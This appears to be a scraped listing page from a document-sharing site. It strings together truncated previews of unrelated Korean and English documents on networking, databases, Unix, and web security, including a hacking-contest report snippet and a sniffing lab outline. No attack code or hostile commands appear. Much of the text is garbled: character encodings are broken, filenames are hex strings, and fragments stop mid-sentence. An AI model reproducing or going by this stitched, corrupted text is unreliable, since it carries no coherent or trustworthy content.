Analyst Briefing . Improve your Outlook on Email and File Management iseminar.. 1544(or 6677)-3355 800x600. iseminar Chat... Improve your Outlook on Email and File Management :, 2003 1 29.. Collaboration Suite - Key Messages

More information

untitled

untitled PowerBuilder ๏ฆš Microsoft SQL Server database PB10.0 PB9.0 ๏ฅด Microsoft SQL Server ๏ฆพ database Profile MSS ๏ฆพ (Microsoft SQL Server database interface) ๏จˆ๏ฆบ PB10.0 ๏ฆบ Sybase ๏ฅง Microsoft ๏ฆพ ๏ฆบ SQL Server ๏ฆพ PB10.0

More information

final_thesis

final_thesis CORBA/SNMP DPNM Lab. POSTECH email : ymkang@postech.ac.kr Motivation CORBA/SNMP CORBA/SNMP 2 Motivation CMIP, SNMP and CORBA high cost, low efficiency, complexity 3 Goal (Information Model) (Operation)

More information

thesis

thesis CORBA TMN Surveillance System DPNM Lab, GSIT, POSTECH Email: mnd@postech.ac.kr Contents Motivation & Goal Related Work CORBA TMN Surveillance System Implementation Conclusion & Future Work 2 Motivation

More information

์ž๋ฐ”-11์žฅN'1-502

์ž๋ฐ”-11์žฅN'1-502 C h a p t e r 11 java.net.,,., (TCP/IP) (UDP/IP).,. 1 ISO OSI 7 1977 (ISO, International Standards Organization) (OSI, Open Systems Interconnection). 6 1983 X.200. OSI 7 [ 11-1] 7. 1 (Physical Layer),

More information

์Šฌ๋ผ์ด๋“œ 1

์Šฌ๋ผ์ด๋“œ 1 / ์œ ๋‹‰์Šค์‹œ์Šคํ…œ๊ฐœ์š” / ํŒŒ์ผ / ํ”„๋กœ์„ธ์Šค 01 File Descriptor file file descriptor file type unix ์—์„œ์˜ํŒŒ์ผ์€๋‹จ์ง€๋ฐ”์ดํŠธ๋“ค์˜๋‚˜์—ด์ž„ operating system ์€ํŒŒ์ผ์—์–ด๋–คํฌ๋งท๋„๋ถ€๊ณผํ•˜์ง€์•Š์Œ ํŒŒ์ผ์˜๋‚ด์šฉ์€๋ฐ”์ดํŠธ๋‹จ์œ„๋กœ์ฃผ์†Œ๋ฅผ์ค„์ˆ˜์žˆ์Œ file descriptor ๋Š” 0 ์ด๋‚˜์–‘์ˆ˜์ž„ file ์€ open ์ด๋‚˜ creat ๋กœ file

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> ๊ฐœ ์š” ํ™ˆํŽ˜์ด์ง€ ํ•ดํ‚น ํ˜„ํ™ฉ ๋ฐ ์‚ฌ๋ก€ ํ™ˆํŽ˜์ด์ง€ ๊ฐœ๋ฐœ์‹œ ๋ณด์•ˆ ์ทจ์•ฝ์  ๋ฐ ๋Œ€์ฑ… ์ฃผ์š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ณด์•ˆ ๋Œ€์ฑ… ๊ฒฐ ๋ก  ์ฐธ๊ณ ์ž๋ฃŒ [๋ถ€๋ก1] ๊ฐœ๋ฐœ ์–ธ์–ด๋ณ„ ๋กœ๊ทธ์ธ ์ธ์ฆ ํ”„๋กœ์„ธ์Šค ์˜ˆ์ œ [๋ถ€๋ก2] ๋Œ€๊ทœ๋ชจ ํ™ˆํŽ˜์ด์ง€ ๋ณ€์กฐ ์˜ˆ๋ฐฉ์„ ์œ„ํ•œ ๊ถŒ๊ณ (์•ˆ) [๋ถ€๋ก3] ๊ฐœ์ธ์ •๋ณด์˜ ๊ธฐ์ˆ ์  ๊ด€๋ฆฌ์  ๋ณดํ˜ธ์กฐ์น˜ ๊ธฐ์ค€(์•ˆ) [๋ถ€๋ก4] ์›น ๋ณด์•ˆ๊ด€๋ จ ์ฃผ์š” ์‚ฌ์ดํŠธ ๋ฆฌ์ŠคํŠธ 7000 6,478 6000 5000

More information

chapter4

chapter4 Basic Netw rk 1. เธ เธ เธ 2. 3. เธ เธ 4. เธ 2 1. 2. 3. 4. เธ 5. เธ 6. เธ เธ 7. เธ 3 เธ เธ เธ เธ (Mainframe) เธ เธ เธ เธ (Terminal) เธ เธ เธ เธ เธ เธ เธ เธ 4 เธ (Dumb Terminal) เธ เธ เธ เธ Mainframe เธ CPU เธ เธ เธ เธ 5 เธ เธ เธ เธ เธ เธ เธ เธ เธ เธ

More information

Copyright 2004 Sun Microsystems, Inc Network Circle, Santa Clara, CA U.S.A..,,. Sun. Sun. Berkeley BSD. UNIX X/Open Company, Ltd.. Sun, Su

Copyright 2004 Sun Microsystems, Inc Network Circle, Santa Clara, CA U.S.A..,,. Sun. Sun. Berkeley BSD. UNIX X/Open Company, Ltd.. Sun, Su Java Desktop System 2 Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 817 7757 10 2004 9 Copyright 2004 Sun Microsystems, Inc. 4150 Network Circle, Santa Clara, CA 95054 U.S.A..,,.

More information

1. What is AX1 AX1 Program์€ WIZnet ์‚ฌ์˜ Hardwired TCP/IP Chip์ธ iinchip ๋“ค์˜์„ฑ๋Šฅํ‰๊ฐ€๋ฐ Test๋ฅผ์œ„ํ•ด์ œ์ž‘๋œ Windows ๊ธฐ๋ฐ˜์˜ PC Program์ด๋‹ค. AX1์€ Internet์„ํ†ตํ•ด iinchip Evaluation

1. What is AX1 AX1 Program์€ WIZnet ์‚ฌ์˜ Hardwired TCP/IP Chip์ธ iinchip ๋“ค์˜์„ฑ๋Šฅํ‰๊ฐ€๋ฐ Test๋ฅผ์œ„ํ•ด์ œ์ž‘๋œ Windows ๊ธฐ๋ฐ˜์˜ PC Program์ด๋‹ค. AX1์€ Internet์„ํ†ตํ•ด iinchip Evaluation 1. What is AX1 AX1 Program์€ WIZnet ์‚ฌ์˜ Hardwired TCP/IP Chip์ธ iinchip ๋“ค์˜์„ฑ๋Šฅํ‰๊ฐ€๋ฐ Test๋ฅผ์œ„ํ•ด์ œ์ž‘๋œ Windows ๊ธฐ๋ฐ˜์˜ PC Program์ด๋‹ค. AX1์€ Internet์„ํ†ตํ•ด iinchip Evaluation Board(EVB B/D) ๋“ค๊ณผ TCP/IP Protocol๋กœ์—ฐ๊ฒฐ๋˜๋ฉฐ, ์—ฐ๊ฒฐ๋œ TCP/IP

More information

CPX-E-SYS_BES_C_ _ k1

CPX-E-SYS_BES_C_ _ k1 CPX-E 8727 27-7 [875294] CPX-E-SYS-KO CODESYS, PI PROFIBUS PROFINET (). :, 2 Festo CPX-E-SYS-KO 27-7 ... 5.... 5.2... 5.3... 5.4... 5.5... 5 2... 6 2.... 6 2..... 6 2..2 CPX-E... 7 2..3 CPX-E... 9 2..4...

More information

<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>

<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378> HUST ๋‚ด๋ถ€ํ•ดํ‚น๋Œ€ํšŒ ๋ณด๊ณ ์„œ Uprising ํŒ€์›: ์ด๊ทœํ˜„, ๊น€์ •์ฃผ, ์žฅ๋ฏผ์„, ์†ก์ง„๊ธฐ Network.1 ๋ฌธ์ œ ํŒŒ์ผ์„ UltraEdit์œผ๋กœ ์—ด์–ด๋ณด๋‹ˆ ip๊ฐ€ ์ ํ˜€์žˆ๊ณ  ํ†ต์‹ ๋‚ด์šฉ์ธ ๊ฒƒ ๊ฐ™์€ ๋‚ด์šฉ๋“ค์ด ํฌํ•จ๋˜์–ด์žˆ์–ด Wireshark๋กœ ์—ด์–ด๋ณด๋‹ˆ ํŒจํ‚ท๋“ค์ด ์บก์ณ๋˜์–ด์žˆ์—ˆ๋‹ค. Wireshark์—์„œ Follow TCP Stream์„ ์ด์šฉํ•ด ํ†ต์‹  ๋‚ด์šฉ์„ ๋ณด๋Š”๋ฐ ์ผ๋ถ€๊ฐ€ ์ธ์ฝ”๋“œ๋œ Base64

More information

DW ๊ฐœ์š”.PDF

DW ๊ฐœ์š”.PDF Data Warehouse Hammersoftkorea BI Group / DW / 1960 1970 1980 1990 2000 Automating Informating Source : Kelly, The Data Warehousing : The Route to Mass Customization, 1996. -,, Data .,.., /. ...,.,,,.

More information

ARMBOOT 1

ARMBOOT 1 100% 2003222 : : : () PGPnet 1 (Sniffer) 1, 2,,, (Sniffer), (Sniffer),, (Expert) 3, (Dashboard), (Host Table), (Matrix), (ART, Application Response Time), (History), (Protocol Distribution), 1 (Select

More information

<%DOC NAME%> (User Manual)

<%DOC NAME%> (User Manual) AVG Email Server Edition 2012 2012.06 (2/ 28/ 2012) Copy right AV G Tec hnologies CZ, s.r.o. All rights res erv ed.. RSA Data Sec urity, Inc. MD5 Mes s age-diges t Algorithm, Copy right (C) 1991-2, RSA

More information

Network Security - Wired Sniffing ์‹ค์Šต ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing ์‹ค์Šต ICNS Lab. Kyung Hee University Network Security - Wired Sniffing ์‹ค์Šต ICNS Lab. Kyung Hee University Outline Network Network ๊ตฌ์กฐ Source-to-Destination ๊ฐ„ packet ์ „๋‹ฌ๊ณผ์ • Packet Capturing Packet Capture ์˜์›๋ฆฌ Data Link Layer ์˜๋™์ž‘ Wired LAN Environment

More information

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - (Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register

More information

์Šฌ๋ผ์ด๋“œ 1

์Šฌ๋ผ์ด๋“œ 1 PKI Kerberos SAML & Shibboleth OpenID Cardspace & ID 2 < > (= ) password, OTP, bio, smartcard, pki CardSpace, ID What you have.., 2 factor, strong authentication 4 (SSO) Kerberos, OpenID 5 Shared authentication

More information

PRO1_04E [์ฝ๊ธฐ ์ „์šฉ]

PRO1_04E [์ฝ๊ธฐ ์ „์šฉ] Siemens AG 1999 All rights reserved File: PRO1_04E1 Information and S7-300 2 S7-400 3 EPROM / 4 5 6 HW Config 7 8 9 CPU 10 CPU : 11 CPU : 12 CPU : 13 CPU : / 14 CPU : 15 CPU : / 16 HW 17 HW PG 18 SIMATIC

More information

Chapter11OSPF

Chapter11OSPF OSPF 111 OSPF Link state Interior Gateway Protocol OSPF 1988 IETF OSPF workgroup OSPF RFC 2383 version 2 Chapter OSPF Version 2 OSPFIGP AS 1 1111 Convergence Traffic Distance Vector Link state OSPF (Flooding),

More information

vm-์›จ์–ด-์•ž๋ถ€์†

vm-์›จ์–ด-์•ž๋ถ€์† VMware vsphere 4 This document was created using the official VMware icon and diagram library. Copyright 2009 VMware, Inc. All rights reserved. This product is protected by U.S. and international copyright

More information

OZ-LMS TM OZ-LMS 2008 OZ-LMS 2006 OZ-LMS Lite Best IT Serviece Provider OZNET KOREA Management Philosophy & Vision Introduction OZNETKOREA IT Mission Core Values KH IT ERP Web Solution IT SW 2000 4 3 508-2

More information

์ดˆ๋ณด์ž๋ฅผ ์œ„ํ•œ ASP.NET 2.0

์ดˆ๋ณด์ž๋ฅผ ์œ„ํ•œ ASP.NET 2.0 (World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET

More information

ํ’ˆ์งˆ๊ฒ€์ฆ๋ถ„์•ผ Stack ํ†ตํ•ฉ Test ๊ฒฐ๊ณผ๋ณด๊ณ ์„œ [ The Bug Genie ]

ํ’ˆ์งˆ๊ฒ€์ฆ๋ถ„์•ผ Stack ํ†ตํ•ฉ Test ๊ฒฐ๊ณผ๋ณด๊ณ ์„œ [ The Bug Genie ] ํ’ˆ์งˆ๊ฒ€์ฆ๋ถ„์•ผ Stack ํ†ตํ•ฉ Test ๊ฒฐ๊ณผ๋ณด๊ณ ์„œ [ The Bug Genie ] 2014. 10. ๋ชฉ ์ฐจ I. Stack ํ†ตํ•ฉํ…Œ์ŠคํŠธ๊ฐœ์š” 1 1. ๋ชฉ์  1 II. ํ…Œ์ŠคํŠธ๋Œ€์ƒ์†Œ๊ฐœ 2 1. The Bug Genie ์†Œ๊ฐœ 2 2. The Bug Genie ์ฃผ์š”๊ธฐ๋Šฅ 3 3. The Bug Genie ์‹œ์Šคํ…œ์š”๊ตฌ์‚ฌํ•ญ๋ฐ์ฃผ์˜์‚ฌํ•ญ 5 III. Stack ํ†ตํ•ฉํ…Œ์ŠคํŠธ 7 1. ํ…Œ์ŠคํŠธํ™˜๊ฒฝ

More information

Voice Portal using Oracle 9i AS Wireless

Voice Portal using Oracle 9i AS Wireless Voice Portal Platform using Oracle9iAS Wireless 20020829 Oracle Technology Day 1 Contents Introduction Voice Portal Voice Web Voice XML Voice Portal Platform using Oracle9iAS Wireless Voice Portal Video

More information

1?4?์˜ฅ?-32

1?4?์˜ฅ?-32 * (ICT),,,,,.., * . ) ( ),, (, ).,,,,., (cyber security).,,. ), ),,,,,,.,,.,.,,...,,, ) (William Gibson) (Neuromancer). ) ; ;.,.. ),,,.,,,,. ..,..,.,...,..,.,..,,,..,.,,,.. . ). (ubiquitous),,. (,, ).

More information

ESP1ยบรŽ-04

ESP1ยบรŽ-04 Chapter 04 4.1..,..,.,.,.,. RTOS(Real-Time Operating System)., RTOS.. VxWorks(www.windriver.com), psos(www.windriver.com), VRTX(www.mento. com), QNX(www.qnx.com), OSE(www.ose.com), Nucleus(www.atinudclus.

More information

Security Overview

Security Overview May. 14, 2004 Background Security Issue & Management Scope of Security Security Incident Security Organization Security Level Security Investment Security Roadmap Security Process Security Architecture

More information

ecorp-ํ”„๋กœ์ ํŠธ์ œ์•ˆ์„œ์ž‘์„ฑ์‹ค๋ฌด(์–‘์‹3)

ecorp-ํ”„๋กœ์ ํŠธ์ œ์•ˆ์„œ์ž‘์„ฑ์‹ค๋ฌด(์–‘์‹3) (BSC: Balanced ScoreCard) ( ) (Value Chain) (Firm Infrastructure) (Support Activities) (Human Resource Management) (Technology Development) (Primary Activities) (Procurement) (Inbound (Outbound (Marketing

More information

Microsoft PowerPoint - chap9 [ํ˜ธํ™˜ ๋ชจ๋“œ]

Microsoft PowerPoint - chap9 [ํ˜ธํ™˜ ๋ชจ๋“œ] ์ œ 9 ์žฅํ”„๋กœ์„ธ์Šค๊ด€๊ณ„ ์ˆ™๋Œ€์ฐฝ๋ณ‘๋ชจ 1 Contents 1. Logins 2. Process Groups 3. Sessions 4. Controlling Terminal 5. Job Control ์ˆ™๋Œ€์ฐฝ๋ณ‘๋ชจ 2 ๋กœ๊ทธ์ธ ์ˆ™๋Œ€์ฐฝ๋ณ‘๋ชจ 3 ํ„ฐ๋ฏธ๋„๋กœ๊ทธ์ธ /etc/ttys: 1 line per terminal device getty: opens terminal device

More information

์›”๊ฐ„ 2016. 03 CONTENTS 3 EXPERT COLUMN ์˜ํ™” ์ ํผ ์™€ ํŠธ๋กœ์ด๋ชฉ๋งˆ 4 SPECIAL REPORT ํŒจ์น˜ ๊ด€๋ฆฌ์˜ ํ•œ๊ณ„์™€ AhnLab Patch Management ํ•ต์‹ฌ์€ ํŒจ์น˜ ๊ด€๋ฆฌ, ์™œ? 8 HOT ISSUE 2016๋…„์— ์ฑ™๊ฒจ๋ด์•ผ ํ•  ๊ฐœ์ธ์ •๋ณด๋ณดํ˜ธ

์›”๊ฐ„ 2016. 03 CONTENTS 3 EXPERT COLUMN ์˜ํ™” ์ ํผ ์™€ ํŠธ๋กœ์ด๋ชฉ๋งˆ 4 SPECIAL REPORT ํŒจ์น˜ ๊ด€๋ฆฌ์˜ ํ•œ๊ณ„์™€ AhnLab Patch Management ํ•ต์‹ฌ์€ ํŒจ์น˜ ๊ด€๋ฆฌ, ์™œ? 8 HOT ISSUE 2016๋…„์— ์ฑ™๊ฒจ๋ด์•ผ ํ•  ๊ฐœ์ธ์ •๋ณด๋ณดํ˜ธ ์•ˆ๋žฉ ์˜จ๋ผ์ธ ๋ณด์•ˆ ๋งค๊ฑฐ์ง„ 2016. 03 Patch Management System ์›”๊ฐ„ 2016. 03 CONTENTS 3 EXPERT COLUMN ์˜ํ™” ์ ํผ ์™€ ํŠธ๋กœ์ด๋ชฉ๋งˆ 4 SPECIAL REPORT ํŒจ์น˜ ๊ด€๋ฆฌ์˜ ํ•œ๊ณ„์™€ AhnLab Patch Management ํ•ต์‹ฌ์€ ํŒจ์น˜ ๊ด€๋ฆฌ, ์™œ? 8 HOT ISSUE 2016๋…„์— ์ฑ™๊ฒจ๋ด์•ผ ํ•  ๊ฐœ์ธ์ •๋ณด๋ณดํ˜ธ ๋ฒ•๋ น ์‚ฌํ•ญ

More information

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜ SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What

More information

F1-1(์ˆ˜์ •).ppt

F1-1(์ˆ˜์ •).ppt , thcho@kisaorkr IPAK (Information Protection Assessment Kit) IAM (INFOSEC Assessment Methodology) 4 VAF (Vulnerability Assessment Framework) 5 OCTAVE (Operationally Critical Threat, Asset, and Vulnerability

More information

..............

.............. ์ธํ„ฐ๋„ท์„ ์ด์šฉํ•œ ์›๊ฒฉ์ง€ ํ…”๋ ˆ๋น„์ „ ์‹œ์ฒญ์„œ๋น„์Šค๋ฅผ ๋‘˜๋Ÿฌ์‹ผ ๋‘ ์‚ฌ๊ฑด ์ธํ„ฐ๋„ท์„ ์ด์šฉํ•œ ์›๊ฒฉ์ง€ ํ…”๋ ˆ๋น„์ „ ์‹œ์ฒญ์„œ๋น„์Šค๋ฅผ ๋‘˜๋Ÿฌ์‹ผ ๋‘ ์‚ฌ๊ฑด ๅผ ็† ๅฃซ ๅคง ๆป ๅ‡ (Hitoshi Otaki) 1) ํ•œ์–‘๋Œ€ํ•™๊ต ๋ฒ•๊ณผ๋Œ€ํ•™ ๆ•Ž ๆŽˆ ๅฐน ๅฎฃ ็†™ 2) ๋ชฉ ์ฐจ (์„œ๋‘์—) 1. ๋‘ ์‚ฌ๊ฑด์˜ ๊ฐœ์š” 2. ๋‹น์‚ฌ์ž๊ฐ€ ์š”๊ตฌํ•œ ํ”ผ๋ณด์ „๊ถŒ๋ฆฌ 3. ์ €์ž‘์ธ์ ‘๊ถŒ์— ๋Œ€ํ•˜์—ฌ 4. ์ฑ„๋ฌด์ž์˜ ์žฅ์น˜ 5. ์ฑ„๋ฌด์ž์˜ ํ–‰์œ„ 6.

More information

KISA-GD

KISA-GD KISA-GD-2011-0002 2011.9 1) RD(Recursive Desired) ํ”Œ๋ž˜๊ทธ : ๋ฆฌ์ปค์‹œ๋ธŒ๋„ค์ž„์„œ๋ฒ„๋กœํ•˜์—ฌ๊ธˆ์žฌ๊ท€์  (recursive) ์งˆ์˜ ( ํ•ญ๋ชฉ 1.3. ์ฐธ๊ณ  ) ์š”์ฒญ์„ํ‘œ์‹œํ•จ. RD ํ”Œ๋ ˆ๊ทธ๊ฐ’์ด 0 ์ด๋ฉด๋ฐ˜๋ณต์  (iterative) ์งˆ์˜๋ฅผ์š”์ฒญ 2) AA ํ”Œ๋ž˜๊ทธ : Authoritative Answer ์˜์•ฝ์ž๋กœ์จ, ๋„ค์ž„์„œ๋ฒ„๊ฐ€ํ•ด๋‹น์‘๋‹ต๋ฐ์ดํ„ฐ๋ฅผ์ž์‹ ์ด๋ณด์œ ํ•˜๊ณ ์žˆ๋Š”์ง€์œ ๋ฌด๋ฅผํ‘œ์‹œ

More information

SyncMLServer-์ •๋ณด๊ณผํ•™ํšŒ_๋…ผ๋ฌธ์ง€.PDF

SyncMLServer-์ •๋ณด๊ณผํ•™ํšŒ_๋…ผ๋ฌธ์ง€.PDF Design and Implementation of SyncML Data Synchronization System based on Session Manager (Byung-Yun Lee) (Gil-Haeng Lee) (Jin-Hyun Cho) (Soo-Hee Ryu) (Hoon Choi) PDA,,, (synchronization) 2000 12,, IBM

More information